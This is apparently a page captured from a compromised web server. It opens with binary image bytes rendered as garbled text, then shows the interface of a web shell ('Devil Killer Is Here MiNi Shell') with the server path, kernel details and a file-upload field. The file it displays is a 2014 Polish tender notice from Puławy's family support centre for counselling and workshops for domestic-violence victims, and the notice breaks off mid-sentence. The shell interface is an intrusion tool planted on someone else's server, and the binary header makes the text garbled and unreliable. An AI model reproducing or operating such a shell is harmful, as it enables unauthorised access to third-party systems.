JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140603/118805-N-2014.html

<p class="kh_header"><b>Puławy: Zorganizowanie i przeprowadzenie zajęć w ramach Programu aktywności lokalnej dla osób doświadczających przemocy domowej lub będących jej świadkami - grupa III</b><br>
<b>Numer ogłoszenia: 118805 - 2014; data zamieszczenia: 03.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , al. Królewska 3, 24-100 Puławy, woj. lubelskie, tel. 81888 04 92, faks 81888 04 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sppulawy.bip.lubelskie.pl; www.efs-pcpr.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie zajęć w ramach Programu aktywności lokalnej dla osób doświadczających przemocy domowej lub będących jej świadkami - grupa III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z II części Część I Trening kompetencji i umiejętności społecznych Część II Poradnictwo grupowe- grupa wsparcia oraz poradnictwo specjalistyczne.Część I: Trening kompetencji i umiejętności społecznych
Przedmiotem zamówienia zorganizowanie i przeprowadzenie treningu kompetencji i umiejętności społecznych podczas 4 - dniowego wyjazdu dla łącznie 25 osób, tj. 10 uczestników programu, tj. osób dorosłych z terenu powiatu puławskiego będących ofiarami lub świadkami przemocy domowej oraz 15 osób dzieci uczestników programu będących w wieku od 4 - 14 lat, łącznie z zakwaterowaniem, ubezpieczeniem od następstw nieszczęśliwych wypadków, wyżywieniem, dowozem z Puław do miejsca zakwaterowania oraz z zapewnieniem powrotu.Część II: Poradnictwo grupowe- grupa wsparcia oraz poradnictwo specjalistyczne Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie grupy wsparcia ( 10 spotkań po 3 godz.), poradnictwa prawnego ( 10 osób po 5 godz. tj. 50 godz. łącznie),  indywidualnej terapii psychologicznej (10 osób po 10 godz. tj. 100 godz.), tj. osób dorosłych z terenu powiatu puławskiego będących ofiarami lub świadkami przemocy domowej oraz zapewnieniu opieki nad 13 dzieci uczestników programu będących w wieku 4 - 14 lat podczas trwania grupy wsparcia dla uczestników programu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 85.12.12.70-6, 55.11.00.00-4, 55.24.00.00-4, 60.17.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny - ocena wyłącznie na podstawie oświadczenia według formuły spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I: na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że wykonał należycie, co najmniej dwie usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, których przedmiotem były 2 usługi szkoleniowe dla min. 15 osób (każda) w formie  wyjazdowej z zapewnieniem zakwaterowania i wyżywienia o wartości nie niższej niż 15 000 zł brutto każda usługa z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługa została wykonana oraz załączenie dowodu czy została wykonana należycie.Przez dwie usługi o charakterystyce jak powyżej Zamawiający rozumie usługi zrealizowane w ramach dwóch różnych umów/kontraktów.Wykonawca powinien w sposób jednoznaczny wykazać, że spełnia opisany warunek. Dowodami są: 1) poświadczenie 2) oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1). W przypadku, gdy Zamawiający jest podmiotem, na rzecz, którego usługi, wskazane w wykazie, o którym mowa wyżej zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej.Ocena na podstawie oświadczenia i dokumentów według formuły spełnia nie spełnia Część II: na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że wykonał należycie, co najmniej jedną usługę w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, których przedmiotem była 1 usługa szkoleniowa z zakresu poradnictwa grupowego z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługa została wykonana oraz załączenie dowodu czy została wykonana należycie. Wykonawca powinien w sposób jednoznaczny wykazać, że spełnia opisany warunek. Dowodami są: 1) poświadczenie 2) oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1). W przypadku, gdy Zamawiający jest podmiotem, na rzecz, którego usługi, wskazane w wykazie, o którym mowa wyżej zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej.Ocena na podstawie oświadczenia i dokumentów według formuły spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny - ocena wyłącznie na podstawie oświadczenia według formuły spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że zapewni przy realizacji zamówienia:
Część I:  minimum 1 osoba tj.: minimum 1 osoba z wykształceniem wyższym na kierunku psychologia i z minimum 5-letnim doświadczeniem w pracy na stanowisku psychologa oraz przynajmniej dwuletnim doświadczeniem w pracy psychologa z ofiarami przemocy Część II: minimum 3 osoby tj.: minimum 1 osoba z wykształceniem wyższym na kierunku psychologia i z minimum 5-letnim doświadczeniem w pracy na stanowisku psychologa oraz przynajmniej dwuletnim doświadczeniem w pracy psychologa z dorosłymi ofiarami przemocy. minimum 1 osoba prowadząca zajęcia powinna posiadać co najmniej wykształcenie wyższe prawnicze, minimum 1 osoba z wykształceniem wyższym na kierunku psychologia i z minimum 5-letnim doświadczeniem w pracy na stanowisku psychologa oraz przynajmniej dwuletnim doświadczeniem w pracy psychologa z dorosłymi ofiarami przemocy Ocena na podstawie oświadczenia i dokumentów według formuły spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny - ocena wyłącznie na podstawie oświadczenia według formuły spełnia nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główne usługi uznaje się usługi niezbędne do wykazania spełniania warunku określonego w pkt III.3.2) Wiedza i doświadczenie Ogłoszenia o zamówieniu.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty wykonawcy, polegające na: a)zmianie terminu realizacji zamówienia, jednak w granicach czasowych określonych w SIWZ - w przypadku klęski żywiołowej lub gdy warunki atmosferyczne uniemożliwiają wykonanie zamówienia w terminie wynikającym z oferty,b)zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia którego strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwią wykonawcy wykonanie w części lub w całości jego zobowiązań,c)zmianie warunków płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie projektu lub wytycznych instytucji wdrażającej dotyczących realizacji projektu,d)zmianie osób, przy pomocy których wykonawca realizować będzie zamówienie, wynikającej z ważnych przyczyn wskazanych przez wykonawcę, które nie mogły być wcześniej przewidziane, z zastrzeżeniem, że proponowane przez wykonawcę w to miejsce osoby będą spełniały warunki określone w SIWZ;  zmiana taka nie wymaga aneksu do umowy lecz jedynie pisemnej zgody zamawiającego,e)zmianie miejsca realizacji usługi, z zastrzeżeniem że proponowane w zamian miejsce spełnia warunki określone w SIWZ, zmiana taka jest możliwa jedynie po uprzednim wyjaśnieniu i udokumentowaniu przez wykonawcę przyczyn dokonania zmiany, a przyczyny te nie leżą po stronie wykonawcy i nie mogły być wcześniej przez niego przewidziane,
f)zmianie w zakresie podwykonawstwa wyłącznie w sytuacji gdy konieczność jej dokonania wynika z ważnych i niemożliwych wcześniej do przewidzenia przyczyn oraz jest niezbędna w celu prawidłowej realizacji przedmiotu zamówienia, przy czym dokonana przez wykonawcę zmiana w powyższym zakresie bez zgody zamawiającego może skutkować rozwiązaniem przez zamawiającego niniejszej umowy ze skutkiem natychmiastowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sppulawy.bip.lubelskie; www.efs-pcpr.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Puławach, al. Królewska 3, 24-100 Puławy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2014 godzina 08:30, miejsce: Powiatowe Centrum Pomocy Rodzinie w Puławach, al. Królewska 3, 24-100 Puławy, sekretariat (pok. nr 1, parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Samodzielni - nie sami jest współfinansowany przez UE w ramach Priorytetu VII Promocja integracji społecznej Działania 7.1 Rozwój i upowszechnianie aktywnej integracji Poddziałania 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie Programu Operacyjnego Kapitał Ludzki...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I: Trening kompetencji i umiejętności społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I Trening kompetencji i umiejętności społecznych.Przedmiotem zamówienia zorganizowanie i przeprowadzenie treningu kompetencji i umiejętności społecznych podczas 4 dniowego wyjazdu dla łącznie 25 osób, tj. 10 uczestników programu, tj. osób dorosłych z terenu powiatu puławskiego będących ofiarami lub świadkami przemocy domowej oraz 15 osób dzieci uczestników programu będących w wieku od 4 - 14 lat, łącznie z zakwaterowaniem, ubezpieczeniem od następstw nieszczęśliwych wypadków, wyżywieniem, dowozem z Puław do miejsca zakwaterowania oraz z zapewnieniem powrotu. Uczestnicy programu to 10 uczestników programu, tj. osób dorosłych z terenu powiatu puławskiego będących ofiarami lub świadkami przemocy domowej oraz 15 dzieci uczestników programu będących w wieku 4 - 14 lat.1. Miejsce realizacji zamówienia: zamawiający zastrzega, aby miejscem realizacji były miejscowości: Kazimierz Dolny, Nałęczów, Lublin Liczba uczestników wyjazdu może ulec zmianie w granicach do 15% in minus.
2) Termin realizacji i czas trwania zamówienia Zamówienie ma być zrealizowane w okresie pomiędzy 1 lipca 2014r. a 24 sierpnia 2014r. przy czym czas trwania zamówienia to 4 dni. Zamawiający zastrzega, że jeżeli umowa zostanie zawarta po 1 lipca 2014r. to Wykonawca zrealizuje przedmiot umowy w terminie od dnia podpisania umowy do 24 sierpnia 2014r. 3. Wymagany minimalny zakres tematyczny Trening kompetencji i umiejętności społecznych ma zawierać co najmniej poniższe zagadnienia tematyczne: komunikacja werbalna i niewerbalna,asertywność, umiejętność stawiania granic,radzenie sobie z trudnymi emocjami, relaksacja, podnoszenie poczucia własnej wartości.W powyższych zajęciach uczestniczyć mają jedynie osoby dorosłe, uczestnicy PAL 4.	Sposób prowadzenia szkolenia oraz czas trwania poszczególnych zajęć:Zajęcia mają być realizowane w formie warsztatów grupowych.Czas trwania zajęć Trening kompetencji i umiejętności społecznych to łącznie 12 godzin, przy czym 1 godzina zajęć to 45 minut treningu. Zajęcia mają być prowadzone w okresie 3 dni, po 4 godziny dziennie.5. Wymagane minimalne kwalifikacje kadry, która będzie prowadziła zajęcia:Zamawiający zastrzega, że zajęcia mają być prowadzone przez 1 osobę: z wykształceniem wyższym na kierunku psychologia i z minimum 5 letnim doświadczeniem w pracy na stanowisku psychologa oraz przynajmniej dwuletnim doświadczeniem w pracy psychologa z osobami dorosłymi - ofiarami przemocy. 6. Inne wymagania jakie ma spełnić wykonawca przy realizacji przedmiotu zamówienia: 1. Wykonawca ma zapewnić oraz wliczyć w koszt zamówienia dla 10 uczestników i 13 osób z otoczenia także:
a) transport autokarowy lub busem osobowym ze sprawną klimatyzacją z Puław do miejsca zakwaterowania oraz przywóz uczestników do Puław. Autobus musi posiadać pasy bezpieczeństwa do przypięcia fotelików dla dzieci. b) transport w przypadku, gdy odległość od miejsca zakwaterowania do miejsca, w którym odbywać się będą zajęcia przekracza 1,5 km,c) pełne wyżywienie (3 posiłki dziennie, tj. śniadanie, obiad tj. zupa, drugie danie, kompot i deser, kolacja) dla wszystkich uczestników oraz ich dzieci z uwzględnieniem potrzeb dietetycznych małych dzieci.
d) bazę noclegową: zakwaterowanie uczestników oraz osób z otoczenia w domu wczasowym, pensjonacie lub hotelu w jednym budynku,zakwaterowanie uczestników w pokojach: 2 pokoje jednoosobowe, 3 pokoje 2 osobowe, 3 pokoje 3 osobowe i 2 pokoje 4 osobowe wszystkie pokoje mają być z pełnym węzłem sanitarnym (łazienkami i toaletami) oraz z  całodobowym dostępem do wrzącej wody 
e) opłatę klimatyczną, miejscową i inną związaną z pobytem uczestników oraz osób z otoczenia za cały okres pobytu, jeśli jest wymagana, f) materiały dydaktyczne szkoleniowe dla każdego uczestnika ( tj. 10 osób) niezbędne do realizacji zajęć oraz materiały biurowe dla każdego uczestnika tj. po 1 notatniku A 5 i po 1 długopisie, które po zakończeniu szkolenia stają się własnością uczestników na każdy rodzaj zajęć;Wszystkie materiały szkoleniowe i biurowe wydawane uczestnikom winny być oznaczone logotypem PCPR w Puławach, UE, EFS i POKL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacji Projekt systemowy Samodzielni  nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u zamawiającego (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy). Wykonawca ma zapewnić dostęp dzieciom do materiałów niezbędnych do przeprowadzenia zajęć z nimi, np. zajęć plastycznych, wspólnych zabaw. g) serwis kawowy dla wszystkich uczestników podczas trwania zajęć (tj. kawa, herbata, cukier, śmietanka do kawy, woda mineralna, napoje, ciastka- 3 rodzaje po 150 g na osobę). Dla dzieci: soki owocowe, ciastka-3 rodzaje po 150 g na osobę, woda mineralna, cukierki - po 5 szt. na osobę. h) ubezpieczenie uczestników oraz osób z otoczenia od następstw nieszczęśliwych wypadków na czas wyjazdu (tj. od wyjazdu z Puław do 